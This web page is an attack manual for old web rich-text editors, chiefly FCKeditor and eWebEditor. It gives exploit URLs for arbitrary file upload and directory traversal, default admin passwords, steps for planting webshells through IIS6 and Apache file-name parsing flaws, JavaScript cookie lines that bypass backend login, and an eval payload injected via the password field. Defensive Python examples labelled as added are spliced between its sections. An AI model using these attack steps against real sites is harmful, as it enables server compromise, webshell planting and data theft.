SoFunction
Updated on 2025-04-13

Common web editor vulnerability manual (full version): FCKeditor, eWebEditor

FCKeditor

FCKeditor editor page / viewing the editor version / viewing the file upload path

FCKeditor Editor Page

FCKeditor/_samples/

View editor version

FCKeditor/_whatsnew.html

View file upload path

fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

The second line of the returned XML, url="/xxx", gives the default base upload path.

Note: [Hell1] As of February 15, 2010, the latest version is FCKeditor v2.6.6.

[Hell2] Remember to replace the two occurrences of "asp" in the paths above with the script language this FCKeditor installation actually uses.

Lack of filtering caused by FCKeditor's passive (denylist) restriction strategy

Affected version: FCKeditor <= v2.4.3

Vulnerability description:

In FCKeditor v2.4.3 the File category refuses the following upload types by default: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

FCKeditor 2.0 <= 2.2 allows uploading files with the asa, cer, php2, php4, inc, pwml and pht suffixes.

After the upload, the file is saved directly as $sFilePath = $sServerDir . $sFileName, without using $sExtension as the suffix.

On Windows this directly allows the check to be broken through by appending one extra character after the uploaded file name [not tested].

Under Apache it can also be exploited because of the "Apache file name resolution defect vulnerability"; see "Appendix A" for details.

It is also recommended that, when defining the Type variable in the other upload vulnerabilities, the File category be used for uploads: according to FCKeditor's code, its restrictions are the narrowest.
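The passage above is about a denylist: a category that refuses a fixed list of suffixes and accepts everything else, so any suffix the list forgot (asa, cer, pht) goes through. The following is an added example, not FCKeditor's own code, contrasting that passive strategy with an allowlist plus a server-chosen storage name; the image allowlist, the name pattern and the function names are assumptions made for the example, while the denied-suffix list is the one quoted for FCKeditor v2.4.3 on this page.

```python
# Added example (not FCKeditor code): denylist vs allowlist upload naming.
import re
import secrets

# The denied suffixes quoted on the page for FCKeditor v2.4.3's File category.
FCK_243_DENIED = set(
    "html htm php php2 php3 php4 php5 phtml pwml inc asp aspx ascx jsp cfm cfc "
    "pl bat exe com dll vbs js reg cgi htaccess asis sh shtml shtm phtm".split()
)

# Allowlist for an image upload slot (constructed for this example).
IMAGE_ALLOWED = {"jpg", "jpeg", "gif", "png"}


def last_extension(filename: str) -> str:
    """Suffix after the final dot, lower-cased; '' when there is no dot."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def denylist_accepts(filename: str) -> bool:
    """Passive strategy: accept unless the last suffix is on the denylist.
    A suffix the list forgot (asa, cer, ...) or an empty last suffix passes."""
    return last_extension(filename) not in FCK_243_DENIED


def allowlist_accepts(filename: str) -> bool:
    """Active strategy: the whole name must be a plain base name plus exactly one
    allowed extension. Extra dots, semicolons, spaces and path separators are
    rejected outright, which also covers the 'a.asp;b.jpg' style names."""
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", filename)
    return m is not None and m.group(1).lower() in IMAGE_ALLOWED


def stored_name(filename: str) -> str:
    """Server-chosen storage name: random base name + validated extension.
    The client-supplied base name is never reused, so there is no rename or
    collision logic ('123(1).jpg') for a client to steer."""
    if not allowlist_accepts(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return f"{secrets.token_hex(8)}.{last_extension(filename)}"


if __name__ == "__main__":
    for name in ["photo.jpg", "shell.asa", "shell.php", "shell.asp;1.jpg", "shell.php."]:
        print(f"{name:18} denylist={denylist_accepts(name)!s:5} allowlist={allowlist_accepts(name)}")
```

Run stand-alone it prints one line per sample name; the denylist column accepts shell.asa and shell.asp;1.jpg because their last suffix is not listed, while the allowlist column rejects everything except photo.jpg.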

Attack exploitation:

Any other suffix can be uploaded.

Using the Windows 2003 path resolution vulnerability to upload a webshell

Affected version: see Appendix B

Vulnerability description:

Using the principle of the Windows 2003 path resolution vulnerability, create a directory with a name similar to "" and upload a file into this directory; it is then executed by the script interpreter with the corresponding script permissions.

Attack exploitation:

fckeditor/editor/filemanager/browser/default/?Type=Image&Connector=connectors/asp/

FCKeditor PHP arbitrary file upload vulnerability

Affected version: FCKeditor 2.2 <= FCKeditor 2.4.2

Vulnerability description:

FCKeditor has an input validation error when processing file uploads. A remote attacker can use this vulnerability to upload arbitrary files.

When uploading files through editor/filemanager/upload/php/, an attacker can cause an arbitrary script to be uploaded by supplying an invalid value for the Type parameter.

A successful attack requires file upload to be enabled in the configuration file, which is disabled by default. Attack exploitation (please modify the action field to the specified URL):

FCKeditor <= 2.4.2 for

Note: If you want to try the v2.2 vulnerability, just change Type to any value, but note that if you change it back to Media, the M must be a capital letter. Otherwise, under Linux, FCKeditor checks the directory name against the file name and the upload fails.

Type custom variable arbitrary file upload vulnerability

Affected version: earlier versions

Vulnerability description:

By customizing the value of the Type parameter, you can create a directory or upload files to a specified directory, and there is no restriction on the uploaded file format.

Attack exploitation: /FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/asp/

Open this address and you can upload any type of file. The default location of the uploaded shell is:

/UserFiles/all/

The variable "Type=all" is custom: the directory all is created here, and the new directory has no restriction on the uploaded file format.

For example, input:

/FCKeditor/editor/filemanager/browser/default/?Type=../&Connector=connectors/asp/

and you can upload to the root directory of the website.

Note: If the default upload folder cannot be found, check this file: fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor news component directory traversal vulnerability

Affected version: the aspx version of FCKeditor; the other versions have not been tested

Vulnerability description: for how to obtain a webshell, refer to the "Type custom variable arbitrary file upload vulnerability" above.

Attack exploitation:

Modify the CurrentFolder parameter with ../../ to enter different directories:

/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=

From the returned XML you can view all directories of the website:

/browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

Other ways of uploading a webshell in FCKeditor

Affected version: non-optimized / non-lite versions of FCKeditor

Vulnerability description:

If the following files exist, you can upload files after opening them.

Attack exploitation:

fckeditor/editor/filemanager/upload/

fckeditor/editor/filemanager/browser/default/connectors/

FCKeditor file upload "." to "_" bypass method

Affected version: FCKeditor >= 2.

Vulnerability description:

A file we upload, for example or;.jpg, becomes shell_php;.jpg. This is a change in the new versions of FCKeditor.

Attack exploitation:

Submit + spaces to get around everything.

Note: spaces are only supported on Windows; *nix is not supported [and + spaces are two different files].

Note: upload/2010/3/ This format is filtered, i.e. the IIS6 resolution vulnerability.

On the first upload the name is filtered to 123_asp; and thus cannot run.

But when a file with the same name is uploaded a second time, since "123_asp;" already exists,

the file is named ;123(1).jpg, ;123(2).jpg, and so on.

So the IIS6 vulnerability can still be used.

If the test through the above steps fails, there may be the following reasons:

1. The file upload function is not enabled; this function is turned off by default when FCKeditor is installed. If you try to upload a file, FCKeditor gives an error message.

2. The website uses a streamlined version of FCKeditor. Many functions of the streamlined version are missing, including the file upload function.

This vulnerability has been fixed.

--------------------------------------------------------------------------------

eWebEditor

eWebEditor exploitation basics

Default backend address: /ewebeditor/admin_login.asp

It is recommended to check first whether the admin_style.asp file can be accessed directly.

Default database path: [PATH]/db/

[PATH]/db/ -- this is the database in some CMSes

You can also try [PATH]/db/% -- some administrators use clever tricks

Use the default password admin/admin888 or admin/admin to enter the backend; you can also try admin/123456 (this is how some administrators and some CMSes set it up).

Click "Style Management": you can add a new style or modify a non-system style, and add |asp, |asa, |aaspsp or |cer to the upload types allowed by the image control, as long as it is a script type the server allows. Click "Submit", then set the toolbar and add the "Insert Picture" control. Then preview this style, click Insert Picture, upload the WEBSHELL, and view the path of the uploaded file in "Code" mode.

2. When the administrator has changed the database to an asp or asa suffix, you can insert a one-sentence * server into the database and then connect with the * client to get the webshell.

3. Cannot execute after uploading? The directory has no permission? Go back to style management and look at the style you edited: you can customize the upload path in it!!!

4. After setting the upload type it still cannot be uploaded? Presumably the file code has been changed. You can try to set the "remote type" as for version 6.0 to use a SHELL (see below for details); you can set the types of remote files that are saved automatically.

5. You cannot add a toolbar, but you have set the file type in a certain style. What should you do? This way:

(Please modify the action field)



eWebEditor intrusion by following predecessors' footprints

Vulnerability description:

When we cannot recover the plaintext of the password MD5 after downloading the database, we can check the style table webeditor_style(14) to see whether any predecessor has already broken in. Perhaps some control has already been given the ability to upload scripts, and we can construct the address to upload our own WEBSHELL.

Attack exploitation:

For example ID=46, s-name = standard1

Construct the code: ?id=content&style=standard

After the ID and style name are changed:

?id=46&style=standard1

eWebEditor directory traversal vulnerability

Vulnerability description:

ewebeditor/admin_uploadfile.asp

admin/

Lack of filtering causes a directory traversal vulnerability.

Attack exploitation:

The first type: ewebeditor/admin_uploadfile.asp?id=14

Append &dir=.. after id=14

Append &dir=../..

With &dir=/../.. I could see the entire website's files.

The second type: ewebeditor/admin/?id=16&d_viewmode=&dir=./..

eWebEditor 5.2 directory listing vulnerability

Vulnerability description:

ewebeditor/asp/

Lack of filtering causes a directory traversal vulnerability.

Attack exploitation:

https:///ewebeditor/asp/?style=standard650&dir=…././/..

Using the eWebEditor session spoofing vulnerability to enter the backend

Vulnerability description:

Vulnerable file: Admin_Private.asp

Only the session is checked; neither the cookie nor the path is verified.

Attack exploitation:

Create a new file with the following content:


Access it, then access any file in the backend, for example Admin_Default.asp

eWebEditor asp version 2.1.6 upload vulnerability

Attack exploitation (please modify the action field to the specified URL):

ewebeditor asp version 2.1.6 upload exploit.html

eWebEditor 2.7.0 injection vulnerability

Attack exploitation:

https:///ewebeditor/?id=article_content&style=full_v200

Default table name: eWebEditor_System. Default column names: sys_UserName, sys_UserPass. Then use nbsi to guess the values.

eWebEditor 2.8.0 final version arbitrary file deletion vulnerability

Vulnerability description:

This vulnerability exists in the file under the Example\NewsSystem directory. This is eWebEditor's test page and can be entered directly without logging in.

Attack exploitation (please modify the action field to the specified URL):

Del

eWebEditor v6.0.0 upload vulnerability

Attack exploitation:

Click "Insert Picture" in the editor, then "Network", and enter the address of your WEBSHELL in the field provided (note: the file name must be of the form and so on). After confirming, click the "Remote File Automatic Upload" control (the first upload prompts you to install the control; wait a moment), check "Code" mode to find the file upload path, and access it. The official eWebEditor DEMO can also be used this way, but execution permission has been removed from the upload directory, so the webshell cannot be executed there.

eWebEditor PHP/ASP backend authentication bypass vulnerability

Affected version: PHP 3.0 to 3.8 and asp 2.8 are common; lower versions may also work, still to be tested.

Attack exploitation:

Enter the backend /eWebEditor/admin/ and enter any user name and password; an error is displayed.

At this point, clear your browser's URL bar and enter

javascript:alert(="adminuser="+escape("admin"));

javascript:alert(="adminpass="+escape("admin"));

javascript:alert(="admindj="+escape("1"));

Press Enter after each of the three lines, clear the browser URL again, and now enter a file that cannot normally be accessed, such as .../ewebeditor/admin/; you go straight in.

eWebEditor for PHP arbitrary file upload vulnerability

Affected version: eWebEditor PHP v3.8 or older

Vulnerability description:

This version saves all style configuration information in the array $aStyle. When register_globals is set to on, we can add any style we like and define the upload type ourselves.

Attack exploitation:



eWebEditor JSP version vulnerability

It is similar. I do not want to say much about it in this document, because there is no test environment and the online information is so cluttered that it is hard to verify. I think the JSP version of eWebEditor has a much smaller share than FCKeditor among JSP editors.

eWebEditor 2.8 commercial version: inserting a * horse

Affected version: >= 2.8 commercial version

Attack exploitation:

Log in to the backend and click "modify password"; set the new password to 1":eval request("h")'

After the change succeeds, just access the asp/ file; a one-sentence * has been written into this file.

eWebEditorNet upload vulnerability (WebEditorNet)

Vulnerability description:

WebEditorNet mainly has an upload vulnerability in one file.

Attack exploitation:

Default upload address: /ewebeditornet/

You can upload a cer * directly.

If you cannot upload, enter javascript:() in the browser address bar;

After success, check the source code and find uploadsave to see the upload save address. By default it is uploaded to the uploadfile folder.

southidceditor (usually uses the v2.8.0 eWeb core)

/admin/southidceditor/datas/

http://www.safe5com/admin/southidceditor/admin/admin_login.asp

https:///admin/southidceditor/

bigcneditor (eWeb 2.7.5 VIP core)

In fact, the so-called Bigcneditor is the VIP user version of eWebEditor 2.7.5. The reason admin_login.asp cannot be accessed and responds with the four-word mantra "not enough permissions" is probably its "Licensed" authorization: perhaps only authorized machines are allowed to access the backend.

Perhaps the tricks above for eWebEditor versions below v2.8 can be used here. It seems there are not many actions?

--------------------------------------------------------------------------------

Cute Editor

Cute Editor online editor local file inclusion vulnerability

Affected version:

CuteEditor for .NET 6.4

Vulnerability description:

You can view the contents of any website file at will, which is very harmful.

Attack exploitation:

https:///CuteSoft_Client/CuteEditor/?type=image&file=../../../

--------------------------------------------------------------------------------

Webhtmleditor

Obtaining a SHELL with the WIN 2003 IIS file name resolution vulnerability

Affected version: <= Webhtmleditor final version 1.7 (updates stopped)

Vulnerability description / attack exploitation:

There is no renaming of uploaded pictures or other files, which allows a malicious user to upload ;.jpg and bypass the suffix check. Given this kind of mistake in the editor author's awareness, even if you encounter thumbnailing and file header checks, you can use a picture * with an inserted one-sentence shell to break through.

--------------------------------------------------------------------------------

Kindeditor

Obtaining a SHELL with the WIN 2003 IIS file name resolution vulnerability

Affected version: <= kindeditor 3.2.1 (the latest version, released in August 2009)

Vulnerability description / attack exploitation:

Here is an official demonstration: enter upload/2010/3/ and you can go and have a look.

Note: see Appendix C for the principle analysis.

--------------------------------------------------------------------------------

Freetextbox

Freetextbox directory traversal vulnerability

Affected version: unknown

Vulnerability description:

Because the code filters only / and not the \ symbol, directory traversal is possible.

Attack exploitation:

Clicking the picture on the editor page pops up a box (capture the packet to get this address) as follows, and you can traverse the directory:

https:///Member/images/ftb/HelperScripts/?frame=1&rif=..&cif=\..
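Several of the traversal issues on this page have the same root cause: a request parameter (FCKeditor's Type and CurrentFolder, eWebEditor's dir, Freetextbox's rif/cif) is joined onto an upload directory without checking where the result lands, and the Freetextbox case shows why filtering the substring "/" is not enough when "\" and URL encoding are left alone. The following is an added example, not code from any of those editors, of how a connector can resolve such a parameter safely: decode, normalise both separator kinds, then compare the normalised result against the root rather than searching for "..". The base path, the function names and the treatment of Type as an allowlist are assumptions for the example; the resource type names are FCKeditor's defaults (the page mentions Image and Media; File and Flash are the other two).

```python
# Added example (not FCKeditor, eWebEditor or Freetextbox code): resolving a
# client-supplied folder parameter so it cannot leave the upload root.
import posixpath
from urllib.parse import unquote

# FCKeditor's default resource types. Anything else, such as "all" or "../",
# is refused instead of becoming a new directory (assumed policy).
RESOURCE_TYPES = {"File", "Image", "Flash", "Media"}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo URL encoding until stable, so %2F and %252F both end up as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_user_folder(base: str, user_folder: str):
    """Absolute folder under `base` named by `user_folder`, or None if it escapes.
    Both '/' and '\\' count as separators (Freetextbox filtered only '/'), and
    the decision is made on the normalised path, not on the presence of '..'."""
    folder = fully_decode(user_folder).replace("\\", "/")
    if "\x00" in folder:
        return None
    root = posixpath.normpath(base)
    target = posixpath.normpath(posixpath.join(root, folder.lstrip("/")))
    if target != root and not target.startswith(root + "/"):
        return None
    return target


def resolve_connector_request(base: str, resource_type: str, current_folder: str):
    """Combine the Type and CurrentFolder checks the way a connector should."""
    if resource_type not in RESOURCE_TYPES:
        return None
    return resolve_user_folder(posixpath.join(base, resource_type), current_folder)


if __name__ == "__main__":
    base = "/var/www/UserFiles"  # assumed upload root
    for t, f in [("Image", "/"), ("Image", "sub/dir/"), ("Image", "../../..%2F"),
                 ("all", "/"), ("../", "/"), ("File", "\\..\\..\\"), ("Image", "..%252F")]:
        print(f"Type={t!r:8} CurrentFolder={f!r:14} -> {resolve_connector_request(base, t, f)}")
```

Only the first two sample requests resolve to a path; the custom Type values, the encoded and double-encoded "../" and the backslash form all return None, which the connector should turn into an error response rather than a directory listing or a CreateFolder.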

--------------------------------------------------------------------------------

Appendix A:

Apache file name resolution defect vulnerability:

Test environment: apache 2.0.53 on winxp, apache 2.0.52 on redhat linux

1. Abroad, SSR TEAM has issued several advisories saying that vulnerabilities related to Apache's MIME module (mod_mime) can be used to execute files as php, including the Discuz! vulnerability.

2. S4T's superhei published a small Apache feature on his blog: Apache checks suffixes starting from the end and executes the file according to the last legal suffix. In fact, just look at the default installation files in Apache's htdocs.

3. That says it very clearly. You can make full use of upload vulnerabilities. I tested according to the file formats that are generally allowed to be uploaded and list them as follows (don't blame the rough classification):

Typical type: rar

Backup type: bak, lock

Streaming media type: wma, wmv, asx, as, mp4, rmvb

Microsoft type: sql, chm, hlp, shtml, asp

Any type: test, fake, ph4nt0m

Special type: torrent

Program type: jsp, c, cpp, pl, cgi

4. The key to the entire vulnerability is what the "legal suffixes" are. Anything that is not a "legal suffix" can be exploited.

5. Test environment

5. Test environment




Then add any suffix to test,...

By cloie, in (c) Security.

Appendix B:

On a server with IIS6 installed (Windows 2003), the affected file name suffixes are .asp .asa .cdx .cer .pl .php .cgi

Windows 2003 Enterprise Edition is Microsoft's current mainstream server operating system. Windows 2003 IIS6 has a file path resolution vulnerability: when a folder name looks like the file name of an ASP file, any type of file under this folder (such as .gif, .jpg, .txt, etc.) is executed by IIS as an ASP program. In this way, a hacker can upload a * file with a jpg or gif extension that looks like an image file and run the * by accessing it. If any folder on such a website has a name ending in .asp .php .cer .asa .cgi .pl, etc., then any type of file placed under that folder may be treated as a script file and handed to the script parser for execution.

Appendix C:

Vulnerability description:

When the file name is [YYY].asp;[ZZZ].jpg, Microsoft IIS automatically parses it as asp.

When the file name is [YYY].php;[ZZZ].jpg, Microsoft IIS automatically parses it as php.

Here [YYY] and [ZZZ] are arbitrary strings.

Affected platforms:

Windows Server 2000 / 2003 / 2003 R2 (IIS 6.0)

Repair method:

1. Wait for the relevant Microsoft patch package.

2. Remove script execution permission from the directory where the pictures are located (provided your pictures are not mixed with program files).

3. Validate all uploaded pictures in the website program and intercept names of the form [YYY].asp;[ZZZ].jpg.

Remark:

Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5) are not affected.
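Repair method 3 above (intercept names of the form [YYY].asp;[ZZZ].jpg) generalises to the other two parsing behaviours described in the appendices: Appendix B's script-suffixed folder names and Appendix A's non-final script suffix. The following is an added example, not from this page's author or any of the editors it covers, of an audit pass over an existing upload directory listing that flags all three; the listing is constructed for the example and the suffix set is the one Appendix B gives (using it for the Apache check as well is an assumption, since Appendix A lists no single set).

```python
# Added example: audit an upload listing for IIS 6 / Apache parsing hazards.
import re

# Appendix B: suffixes IIS 6 hands to a script engine, even when they end a
# *directory* name.  Reused for the Apache multi-extension check (assumption).
SCRIPT_EXTS = {"asp", "asa", "cdx", "cer", "pl", "php", "cgi"}

# Appendix C: "[YYY].asp;[ZZZ].jpg" is parsed as ASP by IIS 6.
IIS6_SEMICOLON = re.compile(r"\.(" + "|".join(SCRIPT_EXTS) + r")\s*;", re.IGNORECASE)


def audit_path(rel_path: str):
    """Return the reasons this stored path is unsafe (empty list = clean)."""
    reasons = []
    parts = rel_path.replace("\\", "/").split("/")
    dirs, name = parts[:-1], parts[-1]

    # Appendix B: a folder whose name ends in a script suffix.
    for d in dirs:
        ext = d.rsplit(".", 1)[-1].lower() if "." in d else ""
        if ext in SCRIPT_EXTS:
            reasons.append(f"directory {d!r} ends with script suffix .{ext} (IIS 6 folder parsing)")

    # Appendix C: script suffix immediately followed by ';'.
    if IIS6_SEMICOLON.search(name):
        reasons.append("IIS 6 semicolon trick in file name")

    # Appendix A: Apache resolves from the right, so a script suffix that is
    # not the last one (e.g. report.php.rar) can still be executed.
    exts = [e.lower() for e in name.split(".")[1:]]
    for e in exts[:-1]:
        if e in SCRIPT_EXTS:
            reasons.append(f"non-final script suffix .{e} (Apache multi-extension parsing)")
    return reasons


def audit_listing(paths):
    """Map each flagged path to its reasons; clean paths are omitted."""
    findings = {}
    for p in paths:
        reasons = audit_path(p)
        if reasons:
            findings[p] = reasons
    return findings


# Constructed sample listing of an upload root.
SAMPLE_LISTING = [
    "UserFiles/Image/photo.jpg",
    "UserFiles/Image/banner.asp;1.jpg",
    "UserFiles/Image/news.asp/logo.gif",
    "UserFiles/File/report.php.rar",
    "UserFiles/Media/clip.mp4",
]

if __name__ == "__main__":
    for path, reasons in audit_listing(SAMPLE_LISTING).items():
        print(path)
        for r in reasons:
            print("   -", r)
```

Fed a real listing (for example the output of a recursive directory walk over the upload root), the same function gives the list of files to quarantine; pairing it with repair method 2, removing script execution permission from the picture directories, covers the cases the scan misses.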